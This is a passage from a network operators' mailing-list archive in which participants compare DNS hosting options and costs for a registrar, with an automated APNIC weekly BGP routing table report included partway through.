<20160812131441.DCB4E50A3B67@rock.dv.isc.org> And regardless of what / who you choose make sure that they are running RFC compliant servers. There are a lot of DNS providers that feel they don't need to use RFC compliant servers which makes problems for all the resolver vendors out there. It also make it hard to deploy new features that depend on servers actually behaving as specified in the RFCs. Most of the problems I see would take 10 minutes for a developer to fix if they are not already fixed and just require a more recent version to be installed. For a list of some of the things you should be checking for see https://tools.ietf.org/html/draft-ietf-dnsop-no-response-issue-03 You can also run the EDNS compliance checker at https://ednscomp.isc.org Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From beckman at angryox.com Fri Aug 12 13:41:13 2016 From: beckman at angryox.com (Peter Beckman) Date: Fri, 12 Aug 2016 09:41:13 -0400 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up time in the last 10-12 years excluding an 8 hour period 4-5 years ago where they got DDOSed, no issues since), very affordable. #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 Has been #1 several months this year. Beckman On Fri, 12 Aug 2016, Ryan Finnesey wrote: > We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? > > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. > > Cheers > Ryan > > --------------------------------------------------------------------------- Peter Beckman Internet Guy beckman at angryox.com http://www.angryox.com/ --------------------------------------------------------------------------- From mehmet at akcin.net Fri Aug 12 14:24:54 2016 From: mehmet at akcin.net (Mehmet Akcin) Date: Fri, 12 Aug 2016 07:24:54 -0700 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: Peter, That test is meaningless as it is from only few locations which seems to overlap with those who scored well. I would suggest using that as a base to compare speed. Mehmet On Friday, August 12, 2016, Peter Beckman wrote: > I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up > time in the last 10-12 years excluding an 8 hour period 4-5 years ago where > they got DDOSed, no issues since), very affordable. > > #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 > > Has been #1 several months this year. > > Beckman > > On Fri, 12 Aug 2016, Ryan Finnesey wrote: > > We need to provide DNS services for domains we offer as a registrar. We >> were discussing internally the different options for the deployment. Does >> anyone see a down side to using IaaS on AWS and Azure? >> >> We were also kicking around the idea of a PaaS offering and using Azure >> DNS or AWS Route 53. >> >> Cheers >> Ryan >> >> >> > ------------------------------------------------------------ > --------------- > Peter Beckman Internet Guy > beckman at angryox.com > http://www.angryox.com/ > ------------------------------------------------------------ > --------------- > From jlk at thrashyour.com Fri Aug 12 14:44:19 2016 From: jlk at thrashyour.com (John Kinsella) Date: Fri, 12 Aug 2016 07:44:19 -0700 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> Also a big fan of DNS Made easy, but I wish they?d add DNSSEC already. I?m happy with AWS - one thing to consider is model out the network costs. That seems to get some people, who just expect the bill for instances at end of month. If you?re worried about availability due to an availability zone going down, ensure you have the service replicated across multiple AZs or regions and It might be worth a few minutes pondering just using Amazon?s Route53 instead of running the DNS server yourself. I haven?t looked at how the cost compares. > On Aug 12, 2016, at 6:41 AM, Peter Beckman wrote: > > I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up > time in the last 10-12 years excluding an 8 hour period 4-5 years ago where > they got DDOSed, no issues since), very affordable. > > #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 > > Has been #1 several months this year. > > Beckman > > On Fri, 12 Aug 2016, Ryan Finnesey wrote: > >> We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? >> >> We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. >> >> Cheers >> Ryan >> >> > > --------------------------------------------------------------------------- > Peter Beckman Internet Guy > beckman at angryox.com http://www.angryox.com/ > --------------------------------------------------------------------------- From bill at herrin.us Fri Aug 12 15:33:59 2016 From: bill at herrin.us (William Herrin) Date: Fri, 12 Aug 2016 11:33:59 -0400 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: On Fri, Aug 12, 2016 at 1:56 AM, Ryan Finnesey wrote: > Does anyone see a down side to using IaaS on AWS and Azure [for DNS]? Latency is critical for DNS. Literally everything else an application does stalls behind completion of the DNS lookups. Everything else being equal, virtuallized infrastructure will always exhibit higher latency than bare metal. Always. > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. I don't know their implementations well. I would hope they run the underlying DNS servers on bare metal rather than leveraging their VM infrastructure. I would worry that they offer all sorts of extra features which are -single source-. If you pick Route 53 and your customers get used to those features you may find yourself locked in at Amazon's mercy. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From keiths at neilltech.com Fri Aug 12 15:36:11 2016 From: keiths at neilltech.com (Keith Stokes) Date: Fri, 12 Aug 2016 15:36:11 +0000 Subject: DNS Services for a registrar In-Reply-To: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> Message-ID: <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Route53 can get expensive for lots of domains. Queries are cheap with the first 1M free, but if you have 1000 domains you?ll pay $500/month. You can build dedicated servers in multiple AZs and data centers able to handle that many domains for far less. You might also consider running dedicated servers in each of AWS and Azure to avoid a single-provider failure. On Aug 12, 2016, at 9:44 AM, John Kinsella > wrote: Also a big fan of DNS Made easy, but I wish they?d add DNSSEC already. I?m happy with AWS - one thing to consider is model out the network costs. That seems to get some people, who just expect the bill for instances at end of month. If you?re worried about availability due to an availability zone going down, ensure you have the service replicated across multiple AZs or regions and It might be worth a few minutes pondering just using Amazon?s Route53 instead of running the DNS server yourself. I haven?t looked at how the cost compares. On Aug 12, 2016, at 6:41 AM, Peter Beckman > wrote: I highly recommend DNS Made Easy. Super fast, extremely reliable (100% up time in the last 10-12 years excluding an 8 hour period 4-5 years ago where they got DDOSed, no issues since), very affordable. #2 fastest for July: http://www.solvedns.com/dns-comparison/2016/07 Has been #1 several months this year. Beckman On Fri, 12 Aug 2016, Ryan Finnesey wrote: We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. Cheers Ryan --------------------------------------------------------------------------- Peter Beckman Internet Guy beckman at angryox.com http://www.angryox.com/ --------------------------------------------------------------------------- --- Keith Stokes From alter3d at alter3d.ca Fri Aug 12 16:29:57 2016 From: alter3d at alter3d.ca (Peter Kristolaitis) Date: Fri, 12 Aug 2016 12:29:57 -0400 Subject: DNS Services for a registrar In-Reply-To: <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Message-ID: On 2016-08-12 11:36 AM, Keith Stokes wrote: > Route53 can get expensive for lots of domains. Queries are cheap with the first 1M free, but if you have 1000 domains you?ll pay $500/month. If you had 1000 domains, you'd pay $110/month, not $500. The first 25 domains at $0.50/month each, after that it's $0.10. And that's based on the publicly available pricing -- they have special pricing if you're hosting >500 domains. Including queries, if each hosted domain had a million queries a month, your total bill would $310. That's probably a high estimate because it doesn't account for the >500 domain special pricing and your average registrar-hosted domain doesn't get anywhere near 1M queries a month. Your actual bill would probably be significantly less. > You can build dedicated servers in multiple AZs and data centers able to handle that many domains for far less. If you were to use c4.large instances, it would cost just under $400/month to have 6 instances spread across 2 regions with 3 AZs each, after instances, load balancers and bandwidth. That's assuming you do the discounted 1-year, no-upfront-fee term on the instances. And you're still not as redundant or fast as Route 53, which is anycast from way more than 6 places. The math gets a little trickier when we start looking at labour costs for both initial development of your platform and ongoing maintenance, but from strictly an infrastructure cost perspective, I don't think the claim that it would cost "far less" to run your own infrastructure is necessarily true for a registrar-doing-hosting scenario. From keiths at neilltech.com Fri Aug 12 17:01:45 2016 From: keiths at neilltech.com (Keith Stokes) Date: Fri, 12 Aug 2016 17:01:45 +0000 Subject: DNS Services for a registrar In-Reply-To: References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Message-ID: Much better math than mine. I pulled from memory and didn?t know the discount @ 25. I?m only running a half-dozen domains in Route53 and the rest are hosted internally. You could probably use less than a c4.large too. On Aug 12, 2016, at 11:29 AM, Peter Kristolaitis > wrote: On 2016-08-12 11:36 AM, Keith Stokes wrote: Route53 can get expensive for lots of domains. Queries are cheap with the first 1M free, but if you have 1000 domains you?ll pay $500/month. If you had 1000 domains, you'd pay $110/month, not $500. The first 25 domains at $0.50/month each, after that it's $0.10. And that's based on the publicly available pricing -- they have special pricing if you're hosting >500 domains. Including queries, if each hosted domain had a million queries a month, your total bill would $310. That's probably a high estimate because it doesn't account for the >500 domain special pricing and your average registrar-hosted domain doesn't get anywhere near 1M queries a month. Your actual bill would probably be significantly less. You can build dedicated servers in multiple AZs and data centers able to handle that many domains for far less. If you were to use c4.large instances, it would cost just under $400/month to have 6 instances spread across 2 regions with 3 AZs each, after instances, load balancers and bandwidth. That's assuming you do the discounted 1-year, no-upfront-fee term on the instances. And you're still not as redundant or fast as Route 53, which is anycast from way more than 6 places. The math gets a little trickier when we start looking at labour costs for both initial development of your platform and ongoing maintenance, but from strictly an infrastructure cost perspective, I don't think the claim that it would cost "far less" to run your own infrastructure is necessarily true for a registrar-doing-hosting scenario. --- Keith Stokes From cscora at apnic.net Fri Aug 12 18:01:40 2016 From: cscora at apnic.net (Routing Analysis Role Account) Date: Sat, 13 Aug 2016 04:01:40 +1000 (AEST) Subject: Weekly Routing Table Report Message-ID: <20160812180140.C9611AB457@thyme.apnic.net> This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, SAFNOG, SdNOG, BJNOG, CaribNOG and the RIPE Routing WG. Daily listings are sent to bgp-stats at lists.apnic.net For historical data, please see http://thyme.rand.apnic.net. If you have any comments please contact Philip Smith . Routing Table Report 04:00 +10GMT Sat 13 Aug, 2016 Report Website: http://thyme.rand.apnic.net Detailed Analysis: http://thyme.rand.apnic.net/current/ Analysis Summary ---------------- BGP routing table entries examined: 605983 Prefixes after maximum aggregation (per Origin AS): 219519 Deaggregation factor: 2.76 Unique aggregates announced (without unneeded subnets): 296865 Total ASes present in the Internet Routing Table: 54571 Prefixes per ASN: 11.10 Origin-only ASes present in the Internet Routing Table: 36463 Origin ASes announcing only one prefix: 15482 Transit ASes present in the Internet Routing Table: 6484 Transit-only ASes present in the Internet Routing Table: 174 Average AS path length visible in the Internet Routing Table: 4.3 Max AS path length visible: 54 Max AS path prepend of ASN ( 55644) 51 Prefixes from unregistered ASNs in the Routing Table: 65 Unregistered ASNs in the Routing Table: 16 Number of 32-bit ASNs allocated by the RIRs: 15008 Number of 32-bit ASNs visible in the Routing Table: 11624 Prefixes from 32-bit ASNs in the Routing Table: 46222 Number of bogon 32-bit ASNs visible in the Routing Table: 27 Special use prefixes present in the Routing Table: 0 Prefixes being announced from unallocated address space: 366 Number of addresses announced to Internet: 2823070052 Equivalent to 168 /8s, 68 /16s and 161 /24s Percentage of available address space announced: 76.3 Percentage of allocated address space announced: 76.3 Percentage of available address space allocated: 100.0 Percentage of address space in use by end-sites: 98.2 Total number of prefixes smaller than registry allocations: 197230 APNIC Region Analysis Summary ----------------------------- Prefixes being announced by APNIC Region ASes: 155411 Total APNIC prefixes after maximum aggregation: 42917 APNIC Deaggregation factor: 3.62 Prefixes being announced from the APNIC address blocks: 168363 Unique aggregates announced from the APNIC address blocks: 68727 APNIC Region origin ASes present in the Internet Routing Table: 5192 APNIC Prefixes per ASN: 32.43 APNIC Region origin ASes announcing only one prefix: 1174 APNIC Region transit ASes present in the Internet Routing Table: 929 Average APNIC Region AS path length visible: 4.4 Max APNIC Region AS path length visible: 54 Number of APNIC region 32-bit ASNs visible in the Routing Table: 2288 Number of APNIC addresses announced to Internet: 759458116 Equivalent to 45 /8s, 68 /16s and 105 /24s APNIC AS Blocks 4608-4864, 7467-7722, 9216-10239, 17408-18431 (pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079, 55296-56319, 58368-59391, 63488-64098, 64297-64395, 131072-137529 APNIC Address Blocks 1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8, ARIN Region Analysis Summary ---------------------------- Prefixes being announced by ARIN Region ASes: 182946 Total ARIN prefixes after maximum aggregation: 89491 ARIN Deaggregation factor: 2.04 Prefixes being announced from the ARIN address blocks: 188570 Unique aggregates announced from the ARIN address blocks: 88668 ARIN Region origin ASes present in the Internet Routing Table: 16255 ARIN Prefixes per ASN: 11.60 ARIN Region origin ASes announcing only one prefix: 5747 ARIN Region transit ASes present in the Internet Routing Table: 1702 Average ARIN Region AS path length visible: 3.8 Max ARIN Region AS path length visible: 23 Number of ARIN region 32-bit ASNs visible in the Routing Table: 1388 Number of ARIN addresses announced to Internet: 1105635168 Equivalent to 65 /8s, 230 /16s and 167 /24s ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106 (pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-3153 3354-4607, 4865-5119, 5632-6655, 6912-7466 7723-8191, 10240-12287, 13312-15359, 16384-17407 18432-20479, 21504-23551, 25600-26591, 26624-27647, 29696-30719, 31744-33791 35840-36863, 39936-40959, 46080-47103 53248-55295, 62464-63487, 64198-64296, 393216-397212 ARIN Address Blocks 3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8, 15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8, 24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8, 38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8, 54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8, 68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8, 96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8, 128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8, 137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8, 147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8, 159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8, 168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8, 198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8, 214/8, 215/8, 216/8, RIPE Region Analysis Summary ---------------------------- Prefixes being announced by RIPE Region ASes: 145178 Total RIPE prefixes after maximum aggregation: 71583 RIPE Deaggregation factor: 2.03 Prefixes being announced from the RIPE address blocks: 155202 Unique aggregates announced from the RIPE address blocks: 96113 RIPE Region origin ASes present in the Internet Routing Table: 18111 RIPE Prefixes per ASN: 8.57 RIPE Region origin ASes announcing only one prefix: 7832 RIPE Region transit ASes present in the Internet Routing Table: 3026 Average RIPE Region AS path length visible: 4.4 Max RIPE Region AS path length visible: 27 Number of RIPE region 32-bit ASNs visible in the Routing Table: 4998 Number of RIPE addresses announced to Internet: 706273664 Equivalent to 42 /8s, 24 /16s and 225 /24s RIPE AS Blocks 1877-1901, 2043, 2047, 2107-2136, 2585-2614 (pre-ERX allocations) 2773-2822, 2830-2879, 3154-3353, 5377-5631 6656-6911, 8192-9215, 12288-13311, 15360-16383 20480-21503, 24576-25599, 28672-29695 30720-31743, 33792-35839, 38912-39935 40960-45055, 47104-52223, 56320-58367 59392-61439, 61952-62463, 64396-64495 196608-207259 RIPE Address Blocks 2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8, LACNIC Region Analysis Summary ------------------------------ Prefixes being announced by LACNIC Region ASes: 61758 Total LACNIC prefixes after maximum aggregation: 12273 LACNIC Deaggregation factor: 5.03 Prefixes being announced from the LACNIC address blocks: 77094 Unique aggregates announced from the LACNIC address blocks: 36939 LACNIC Region origin ASes present in the Internet Routing Table: 2470 LACNIC Prefixes per ASN: 31.21 LACNIC Region origin ASes announcing only one prefix: 555 LACNIC Region transit ASes present in the Internet Routing Table: 581 Average LACNIC Region AS path length visible: 4.8 Max LACNIC Region AS path length visible: 24 Number of LACNIC region 32-bit ASNs visible in the Routing Table: 2706 Number of LACNIC addresses announced to Internet: 170203968 Equivalent to 10 /8s, 37 /16s and 27 /24s LACNIC AS Blocks 26592-26623, 27648-28671, 52224-53247, 61440-61951, 64099-64197, 262144-265628 + ERX transfers LACNIC Address Blocks 177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8, 191/8, 200/8, 201/8, AfriNIC Region Analysis Summary ------------------------------- Prefixes being announced by AfriNIC Region ASes: 14402 Total AfriNIC prefixes after maximum aggregation: 3245 AfriNIC Deaggregation factor: 4.44 Prefixes being announced from the AfriNIC address blocks: 16388 Unique aggregates announced from the AfriNIC address blocks: 6087 AfriNIC Region origin ASes present in the Internet Routing Table: 738 AfriNIC Prefixes per ASN: 22.21 AfriNIC Region origin ASes announcing only one prefix: 174 AfriNIC Region transit ASes present in the Internet Routing Table: 177 Average AfriNIC Region AS path length visible: 4.5 Max AfriNIC Region AS path length visible: 20 Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 244 Number of AfriNIC addresses announced to Internet: 81167616 Equivalent to 4 /8s, 214 /16s and 133 /24s AfriNIC AS Blocks 36864-37887, 327680-328703 & ERX transfers AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8, APNIC Region per AS prefix count summary ---------------------------------------- ASN No of nets /20 equiv MaxAgg Description 4538 5544 4190 74 ERX-CERNET-BKB China Education and Rese 7545 3483 385 256 TPG-INTERNET-AP TPG Telecom Limited, AU 4766 3192 11145 1127 KIXS-AS-KR Korea Telecom, KR 17974 2939 904 78 TELKOMNET-AS2-AP PT Telekomunikasi Indo 9829 2633 1491 518 BSNL-NIB National Internet Backbone, IN 9808 2143 8781 42 CMNET-GD Guangdong Mobile Communication 4755 2056 429 225 TATACOMM-AS TATA Communications formerl 4808 1797 2300 543 CHINA169-BJ China Unicom Beijing Provin 24560 1532 505 217 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd 38197 1505 93 289 SUNHK-DATA-AS-AP Sun Network (Hong Kong Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC ARIN Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 22773 3498 2964 144 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 6389 2227 3671 41 BELLSOUTH-NET-BLK - BellSouth.net Inc., 18566 2195 405 110 MEGAPATH5-US - MegaPath Corporation, US 20115 1937 1965 403 CHARTER-NET-HKY-NC - Charter Communicat 30036 1757 345 267 MEDIACOM-ENTERPRISE-BUSINESS - Mediacom 209 1717 5083 658 CENTURYLINK-US-LEGACY-QWEST - Qwest Com 6983 1687 849 228 ITCDELTA - Earthlink, Inc., US 16509 1376 2482 449 AMAZON-02 - Amazon.com, Inc., US 7018 1344 20054 998 ATT-INTERNET4 - AT&T Services, Inc., US 701 1290 10719 696 UUNET - MCI Communications Services, In Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN RIPE Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 39891 3329 169 15 ALJAWWALSTC-AS , SA 20940 2740 1052 1947 AKAMAI-ASN1 , US 34984 1976 327 357 TELLCOM-AS , TR 12479 1313 1018 45 UNI2-AS , ES 8551 1213 377 46 BEZEQ-INTERNATIONAL-AS Bezeqint Interne 6849 1148 355 21 UKRTELNET , UA 13188 1095 98 63 BANKINFORM-AS , UA 8402 1010 544 15 CORBINA-AS Russia, RU 9198 971 352 25 KAZTELECOM-AS , KZ 6830 884 2752 463 LGI-UPC formerly known as UPC Broadband Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE LACNIC Region per AS prefix count summary ----------------------------------------- ASN No of nets /20 equiv MaxAgg Description 10620 3460 540 170 Telmex Colombia S.A., CO 8151 2265 3361 544 Uninet S.A. de C.V., MX 7303 1531 949 243 Telecom Argentina S.A., AR 6503 1415 437 54 Axtel, S.A.B. de C.V., MX 11830 1342 368 64 Instituto Costarricense de Electricidad 6147 1093 377 27 Telefonica del Peru S.A.A., PE 3816 1003 480 178 COLOMBIA TELECOMUNICACIONES S.A. ESP, C 7738 994 1882 40 Telemar Norte Leste S.A., BR 11172 906 125 76 Alestra, S. de R.L. de C.V., MX 28573 895 2179 162 CLARO S.A., BR Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC AfriNIC Region per AS prefix count summary ------------------------------------------ ASN No of nets /20 equiv MaxAgg Description 24863 1184 402 48 LINKdotNET-AS, EG 36903 656 330 109 MT-MPLS, MA 37611 652 48 2 Afrihost, ZA 36992 539 1357 26 ETISALAT-MISR, EG 8452 513 1472 15 TE-AS TE-AS, EG 37492 392 246 69 ORANGE-TN, TN 24835 346 610 16 RAYA-AS, EG 29571 300 37 12 CITelecom-AS, CI 15399 293 35 6 WANANCHI-KE, KE 2018 265 327 74 TENET-1, ZA Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC Global Per AS prefix count summary ---------------------------------- ASN No of nets /20 equiv MaxAgg Description 4538 5544 4190 74 ERX-CERNET-BKB China Education and Rese 22773 3498 2964 144 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 7545 3483 385 256 TPG-INTERNET-AP TPG Telecom Limited, AU 10620 3460 540 170 Telmex Colombia S.A., CO 39891 3329 169 15 ALJAWWALSTC-AS , SA 4766 3192 11145 1127 KIXS-AS-KR Korea Telecom, KR 17974 2939 904 78 TELKOMNET-AS2-AP PT Telekomunikasi Indo 20940 2740 1052 1947 AKAMAI-ASN1 , US 9829 2633 1491 518 BSNL-NIB National Internet Backbone, IN 8151 2265 3361 544 Uninet S.A. de C.V., MX Complete listing at http://thyme.rand.apnic.net/current/data-ASnet Global Per AS Maximum Aggr summary ---------------------------------- ASN No of nets Net Savings Description 22773 3498 3354 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 39891 3329 3314 ALJAWWALSTC-AS , SA 10620 3460 3290 Telmex Colombia S.A., CO 7545 3483 3227 TPG-INTERNET-AP TPG Telecom Limited, AU 17974 2939 2861 TELKOMNET-AS2-AP PT Telekomunikasi Indo 6389 2227 2186 BELLSOUTH-NET-BLK - BellSouth.net Inc., 9829 2633 2115 BSNL-NIB National Internet Backbone, IN 9808 2143 2101 CMNET-GD Guangdong Mobile Communication 18566 2195 2085 MEGAPATH5-US - MegaPath Corporation, US 4766 3192 2065 KIXS-AS-KR Korea Telecom, KR Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet List of Unregistered Origin ASNs (Global) ----------------------------------------- Bad AS Designation Network Transit AS Description 65001 PRIVATE 5.143.176.0/20 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.192.0/20 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.192.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.200.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.208.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65001 PRIVATE 31.172.216.0/21 15468 KLGELECS-AS 38, Teatralnaya st 65000 PRIVATE 31.219.177.0/25 8966 ETISALAT-AS P.O. Box 1150, Dub 65000 PRIVATE 31.219.177.128/25 8966 ETISALAT-AS P.O. Box 1150, Dub 65412 PRIVATE 41.89.7.0/24 36866 JTL, KE 65512 PRIVATE 45.252.244.0/24 45899 VNPT-AS-VN VNPT Corp, VN Complete listing at http://thyme.rand.apnic.net/current/data-badAS Advertised Unallocated Addresses -------------------------------- Network Origin AS Description 23.249.144.0/20 40430 COLO4JAX-AS - colo4jax, LLC, US 27.100.7.0/24 56096 UNKNOWN 41.73.1.0/24 37004 -Reserved AS-, ZZ 41.73.2.0/24 37004 -Reserved AS-, ZZ 41.73.3.0/24 37004 -Reserved AS-, ZZ 41.73.4.0/24 37004 -Reserved AS-, ZZ 41.73.5.0/24 37004 -Reserved AS-, ZZ 41.73.6.0/24 37004 -Reserved AS-, ZZ 41.73.7.0/24 37004 -Reserved AS-, ZZ 41.73.8.0/24 37004 -Reserved AS-, ZZ Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA Number of prefixes announced per prefix length (Global) ------------------------------------------------------- /1:0 /2:0 /3:0 /4:0 /5:0 /6:0 /7:0 /8:16 /9:13 /10:36 /11:101 /12:266 /13:518 /14:1051 /15:1771 /16:13146 /17:7828 /18:12740 /19:25283 /20:38406 /21:40068 /22:67238 /23:59029 /24:336803 /25:570 /26:584 /27:382 /28:54 /29:32 /30:14 /31:1 /32:33 Advertised prefixes smaller than registry allocations ----------------------------------------------------- ASN No of nets Total ann. Description 39891 2896 3329 ALJAWWALSTC-AS , SA 22773 2728 3498 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 18566 2087 2195 MEGAPATH5-US - MegaPath Corporation, US 30036 1570 1757 MEDIACOM-ENTERPRISE-BUSINESS - Mediacom 6389 1438 2227 BELLSOUTH-NET-BLK - BellSouth.net Inc., 10620 1387 3460 Telmex Colombia S.A., CO 6983 1338 1687 ITCDELTA - Earthlink, Inc., US 34984 1259 1976 TELLCOM-AS , TR 11492 1180 1278 CABLEONE - CABLE ONE, INC., US 6849 968 1148 UKRTELNET , UA Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos Number of /24s announced per /8 block (Global) ---------------------------------------------- 1:1616 2:763 4:21 5:2138 6:31 8:987 12:1767 13:43 14:1750 15:45 16:2 17:91 18:123 20:49 22:1 23:1595 24:1799 27:2304 31:1775 32:69 33:3 34:2 35:5 36:323 37:2307 38:1243 39:35 40:94 41:2838 42:449 43:1859 44:43 45:2152 46:2541 47:85 49:1189 50:901 51:12 52:544 54:345 55:7 56:7 57:42 58:1638 59:980 60:364 61:1811 62:1504 63:1925 64:4548 65:2177 66:4259 67:2206 68:1129 69:3261 70:1250 71:485 72:2013 74:2546 75:347 76:393 77:1445 78:1263 79:860 80:1274 81:1398 82:978 83:712 84:849 85:1615 86:486 87:1096 88:543 89:2117 90:213 91:6087 92:979 93:2369 94:2448 95:2496 96:498 97:353 98:949 99:41 100:78 101:1085 103:11912 104:2542 105:124 106:438 107:1329 108:647 109:2252 110:1279 111:1658 112:1041 113:1243 114:1079 115:1667 116:1629 117:1543 118:2018 119:1585 120:926 121:1111 122:2260 123:2005 124:1587 125:1805 128:667 129:425 130:410 131:1353 132:628 133:172 134:471 135:141 136:384 137:394 138:1811 139:421 140:549 141:452 142:660 143:935 144:729 145:164 146:932 147:654 148:1391 149:538 150:645 151:872 152:637 153:300 154:649 155:961 156:519 157:492 158:382 159:1144 160:510 161:731 162:2375 163:559 164:903 165:1073 166:323 167:1166 168:2020 169:664 170:1850 171:254 172:664 173:1661 174:758 175:699 176:1726 177:4079 178:2212 179:1176 180:2146 181:1823 182:2012 183:966 184:821 185:7139 186:3096 187:2129 188:2171 189:1721 190:7733 191:1263 192:9007 193:5733 194:4437 195:3848 196:1725 197:1126 198:5543 199:5741 200:7157 201:3644 202:10133 203:9805 204:4499 205:2712 206:2974 207:3091 208:4053 209:3877 210:3873 211:2047 212:2726 213:2366 214:866 215:69 216:5870 217:1976 218:796 219:609 220:1638 221:868 222:689 223:1257 End of report From fhr at fhrnet.eu Fri Aug 12 18:28:48 2016 From: fhr at fhrnet.eu (Filip Hruska) Date: Fri, 12 Aug 2016 20:28:48 +0200 Subject: DNS Services for a registrar In-Reply-To: References: Message-ID: Hi, If you are going the IaaS route, definitely checkout KnotDNS project. According to their benchmarks [1], it does much better than other DNS servers in about every workload. Best Regards, Filip [1] https://www.knot-dns.cz/benchmark/ On 12.8.2016 07:56, Ryan Finnesey wrote: > We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure? > > We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53. > > Cheers > Ryan > From beckman at angryox.com Fri Aug 12 19:24:04 2016 From: beckman at angryox.com (Peter Beckman) Date: Fri, 12 Aug 2016 15:24:04 -0400 Subject: DNS Services for a registrar In-Reply-To: <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com> <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com> Message-ID: If there are other metrics in which to measure DNS speed, availability and redundancy, I'd love to seeing them. I have but my own datapoint and the metrics from others. Tear down the testing model, but at least show a different/better one in 